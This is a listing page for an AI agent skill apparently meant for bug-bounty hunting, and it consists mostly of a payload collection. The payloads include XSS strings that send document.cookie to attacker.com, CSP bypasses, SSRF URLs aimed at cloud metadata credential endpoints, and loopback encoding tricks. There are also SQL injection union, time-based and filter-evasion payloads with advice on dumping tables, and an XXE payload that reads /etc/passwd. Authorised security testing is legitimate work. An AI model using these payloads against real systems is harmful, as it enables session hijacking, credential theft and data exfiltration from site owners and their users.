argus
Argus — the all-seeing scanner suite. Six automated scanners for high-value web + LLM bug classes — CORS misconfiguration (origin reflection / null /…
Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass,
$ npx -y skills add shuvonsec/claude-bug-bounty --skill security-arsenal --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/security-arsenalContext preview
The summary Claude sees to decide when to auto-load this skill.
Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass,
name: security-arsenal description: Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, bypass techniques, or to check if a finding is submittable. Also use when asked about what NOT to submit.
Payloads, bypass tables, wordlists, and submission rules.
---
<script>alert(document.domain)</script> <img src=x onerror=alert(document.domain)> <svg onload=alert(document.domain)> "><script>alert(1)</script> '><img src=x onerror=alert(1)> javascript:alert(document.domain)
<script>document.location='https://attacker.com/c?c='+document.cookie</script>
<img src=x onerror="fetch('https://attacker.com?c='+document.cookie)">
<script>fetch('https://attacker.com?c='+btoa(document.cookie))</script>// If unsafe-inline blocked — use fetch/XHR
<img src=x onerror="fetch('https://attacker.com?d='+btoa(document.cookie))">
// If script-src nonce present — find nonce reflection
<script nonce="NONCE_FROM_PAGE">alert(1)</script>
// Angular template injection (bypasses many CSPs)
{{constructor.constructor('alert(1)')()}}
// React dangerouslySetInnerHTML reflection
// Vue v-html binding
// mXSS (mutation-based XSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
// Polyglot (works in HTML/JS/CSS context)
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>// Sources (user-controlled input) location.hash location.search location.href document.referrer window.name document.URL // Sinks (dangerous) innerHTML = SOURCE outerHTML = SOURCE document.write(SOURCE) eval(SOURCE) setTimeout(SOURCE, ...) // string form setInterval(SOURCE, ...) new Function(SOURCE) element.src = SOURCE // javascript: URI element.href = SOURCE location.href = SOURCE
---
# AWS http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME http://169.254.169.254/latest/user-data/ http://169.254.169.254/latest/dynamic/instance-identity/document # GCP http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token # Header: Metadata-Flavor: Google # Azure IMDS http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Header: Metadata: true
http://localhost:6379 # Redis (unauthenticated, RESP protocol) http://localhost:9200 # Elasticsearch (/_cat/indices) http://localhost:27017 # MongoDB (binary — check for connection refused vs timeout) http://localhost:8080 # Admin panel http://localhost:2375 # Docker API — GET /containers/json http://localhost:10.96.0.1:443 # Kubernetes API server
# All of these map to 127.0.0.1: http://2130706433 # decimal http://0177.0.0.1 # octal http://0x7f.0x0.0x0.0x1 # hex http://127.1 # short form http://[::1] # IPv6 loopback http://[::ffff:127.0.0.1] # IPv4-mapped IPv6 http://[::ffff:0x7f000001] # mixed hex IPv6 # DNS rebinding: A→external, then resolves to internal after allowlist check # Redirect chain (Vercel pattern): # If filter only checks initial URL but follows redirects: http://allowed-domain.com/redirect?to=http://169.254.169.254/
---
' '' ` ') ')) ' OR '1'='1 ' OR 1=1-- ' OR 1=1# ' UNION SELECT NULL-- '; WAITFOR DELAY '0:0:5'-- -- MSSQL time-based '; SELECT SLEEP(5)-- -- MySQL time-based ' OR SLEEP(5)--
' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT 'a',NULL,NULL--
-- pick DBMS by stack: .asp/IIS→MSSQL, .php→MySQL, Java/Python→PG/Oracle -- column count first: ' ORDER BY 1-- ↑ until error = N-1 cols 0' UNION SELECT NULL,'MARKER',NULL-- -- find a displayable column -- fingerprint + identity (ONE readable value = valid finding): 0' UNION SELECT NULL,@@version,NULL-- -- MSSQL/MySQL 0' UNION SELECT NULL,version(),NULL-- -- PostgreSQL 0' UNION SELECT NULL,SYSTEM_USER,NULL-- -- MSSQL (current_user / USER() elsewhere) -- schema walk + one-request dump of a sensitive table: 0' UNION SELECT NULL,TABLE_NAME,NULL FROM INFORMATION_SCHEMA.TABLES-- -- MySQL/MSSQL/PG (Oracle: ALL_TABLES) -- MySQL GROUP_CONCAT() · MSSQL/PG STRING_AGG() · Oracle LISTAGG() → dump in one request
Reading a credentials/config table is a valid standalone finding — submit on data, not a 500. (DB→OS escalation only if the DB user is sysadmin/superuser AND host exec is in scope.)
# MySQL
' AND SLEEP(5)--
# PostgreSQL
' AND pg_sleep(5)--
# MSSQL
'; WAITFOR DELAY '0:0:5'--
# Oracle
' AND 1=dbms_pipe.receive_message('a',5)--/*!50000 SELECT*/ * FROM users -- MySQL inline comment SE/**/LECT * FROM users -- comment injection SeLeCt * FrOm uSeRs -- case variation %27 OR %271%27=%271 -- URL encoding ʼ OR ʼ1ʼ=ʼ1 -- Unicode apostrophe
---
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
AI-powered bug bounty hunting toolkit that works with or without subscription.
Repo: shuvonsec/claude-bug-bounty
Argus — the all-seeing scanner suite. Six automated scanners for high-value web + LLM bug classes — CORS misconfiguration (origin reflection / null /…
Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the…
Complete bug bounty workflow — recon (subdomain enumeration, asset discovery, fingerprinting, HackerOne scope, source code audit), pre-hunt learning (disclosed…
CI/CD pipeline security hunting — GitHub Actions workflow injection, secret exfiltration, self-hosted runner poisoning, dependency confusion, OIDC token theft,…
Client-side request-signing and anti-bot token reversal for bug bounty — when a request carries a sign/sig/hmac/token/nonce/timestamp/X-Sensor header that Burp…
Password spray methodology for bug bounty — when to do it vs web-vuln hunting, the wordlist-gen + breach-check + osint-employees + spray pipeline, mode…